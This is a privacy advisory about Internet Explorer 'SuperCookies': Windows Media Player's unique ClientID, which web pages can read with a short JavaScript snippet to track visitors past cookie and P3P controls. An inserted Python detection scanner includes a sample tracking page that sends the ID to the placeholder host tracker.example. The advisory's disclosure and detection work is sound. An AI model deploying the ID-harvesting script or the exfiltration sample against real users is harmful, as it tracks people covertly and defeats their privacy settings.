Internet Explorer SuperCookies bypass P3P and cookie controls


Richard M. Smith (rms@computerbytesman.com)
January 16, 2002 (Updated Sept. 23, 2003)

Introduction

There is a significant privacy problem with Internet Explorer because of a design flaw in the Windows Media Player (WMP). Using simple Javascript code on a Web page, a Web site can grab the unique ID number of the Windows Media Player belonging to a Web site visitor. This ID number can then be used just like a cookie by Web sites to track a user's travels around the Web.

However this ID number becomes a SuperCookie because it can be used by Web sites to bypass all of the new privacy and P3P protections that Microsoft has added to Internet Explorer 6 (IE6). IE6 ships today with all Windows XP systems. SuperCookies also work in all previous versions of Internet Explorer with all older versions of Windows.

Some of the other features of SuperCookies include:

After this article appeared, the SuperCookie problem was fixed by Microsoft in version 9 of the Windows Media Player by having all computers return the same cookie value of {3300AD50-2C39-46c0-AE0A-000000000000}.

Demo Page

I've set up a simple demo page that shows the issue:

http://www.computerbytesman.com/privacy/supercookiedemo.htm

Technical Details

When the Windows Media Player is installed on a computer, a unique ID number in the form of a GUID is assigned to the player. This ID number is stored in the Windows registry. The ActiveX interface to the Windows Media Player allows any JavaScript Program to retrieve the ID number using the property "ClientID".

The following example HTML and JavaScript code illustrates how easy it is to retrieve the ID number:

<OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=WMP WIDTH=1 HEIGHT=1>
</OBJECT>

<script>
alert(document.WMP.ClientID);
</script>

Once the ID number is available to a JavaScript program, it can be sent back to a Web site either by appending it to the URL of a Web bug or by storing it in a regular Web browser cookie.
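As an added example (not part of the original advisory), the following Python scanner shows how a defender could detect the tracking pattern described above in page content captured by a proxy or crawler: an embedded WMP ActiveX object (the clsid from the snippet above) combined with a read of its ClientID property. The two sample pages are constructed for the example; the classid and property name come from the advisory.

```python
import re

# Values taken from the advisory: the WMP ActiveX class id and the property read.
WMP_CLASSID = "22D6F312-B0F6-11D0-94AB-0080C74C7E95"
WMP_PROPERTY = "ClientID"

# An <OBJECT> tag whose classid attribute names the WMP control.
OBJECT_RE = re.compile(
    r'<object\b[^>]*classid\s*=\s*["\']?clsid:' + re.escape(WMP_CLASSID) + r'["\']?[^>]*>',
    re.IGNORECASE,
)
# Any script-level access of the form "<something>.ClientID".
CLIENTID_RE = re.compile(r"\.\s*" + WMP_PROPERTY + r"\b")


def scan_html(html: str) -> dict:
    """Classify one HTML document.

    wmp_object:     a WMP ActiveX <OBJECT> is embedded
    clientid_reads: number of ".ClientID" accesses found in the page
    hidden_player:  the object is sized 1x1 or smaller (no visible player)
    supercookie:    object present AND its ID is read -> tracking pattern
    """
    obj = OBJECT_RE.search(html)
    reads = CLIENTID_RE.findall(html)
    hidden = False
    if obj:
        tag = obj.group(0)
        w = re.search(r'width\s*=\s*["\']?(\d+)', tag, re.IGNORECASE)
        h = re.search(r'height\s*=\s*["\']?(\d+)', tag, re.IGNORECASE)
        hidden = bool(w and h and int(w.group(1)) <= 1 and int(h.group(1)) <= 1)
    return {
        "wmp_object": obj is not None,
        "clientid_reads": len(reads),
        "hidden_player": hidden,
        "supercookie": obj is not None and len(reads) > 0,
    }


# Constructed sample: the pattern from the advisory, sending the ID to a Web bug.
TRACKING_PAGE = """
<html><body>
<OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=WMP WIDTH=1 HEIGHT=1>
</OBJECT>
<script>
var img = new Image();
img.src = "http://tracker.example/bug.gif?id=" + document.WMP.ClientID;
</script>
</body></html>
"""

# Constructed sample: a page that merely embeds a visible player to play a clip.
BENIGN_PAGE = """
<html><body>
<OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=Player WIDTH=320 HEIGHT=240>
<PARAM name="FileName" value="clip.asf">
</OBJECT>
</body></html>
"""

if __name__ == "__main__":
    for name, page in (("tracking", TRACKING_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_html(page))
```

The scan is purely static, so it will miss scripts that build the property name at runtime or that reach the object through a frame; it is meant as a cheap first-pass filter over captured HTML, after which flagged pages can be reviewed by hand.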

The actual WMP player ID number is stored in the Windows registry in these keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General
string value "UniqueID"

or

HKEY_USERS\<user>\Software\Microsoft\Windows Media\WMSDK\General
string value "UniqueID"

If one of these keys is manually changed using REGEDIT, the demo page will show the new ID number. However, leaving the keys changed may break the Digital Rights Management (DRM) features of WMP.

In newer versions of WMP, there is an option on the "Tools | Options" menu called "Allow Internet sites to uniquely identify your player". If this option is manually turned off, SuperCookies will also be disabled because Internet Explorer will generate a new player ID number for each IE session.

SuperCookies also work in Netscape Navigator if the WMP plugin has been installed.

Recommendations for Microsoft

I originally notified Microsoft of this problem in March 2001. At that time there was no method of turning off SuperCookies except to uninstall WMP or disable JavaScript. Neither solution was very useful. In response to my message to Microsoft, they updated WMP to provide per-session player ID numbers when the WMP option "Allow Internet sites to uniquely identify your player" is unchecked. This update is described in this Microsoft security bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-029.asp
However, I do not believe that this is a workable solution for the majority of Windows users. Asking them to change an obscure WMP setting to fix a privacy leak in Internet Explorer is not a good policy. Instead, I believe that the ClientID property in the WMP ActiveX control should be permanently disabled by having it return an ID number of zero for all players.

Acknowledgements

Thanks to the many folks on the BugTraq and NTBugTraq mailing lists for helping sort out all of the technical details of this issue. Russ Cooper, moderator of NTBugTraq, was particularly helpful. Andrew Schulman and David Martin also provided very useful feedback on the initial versions of this advisory.

Links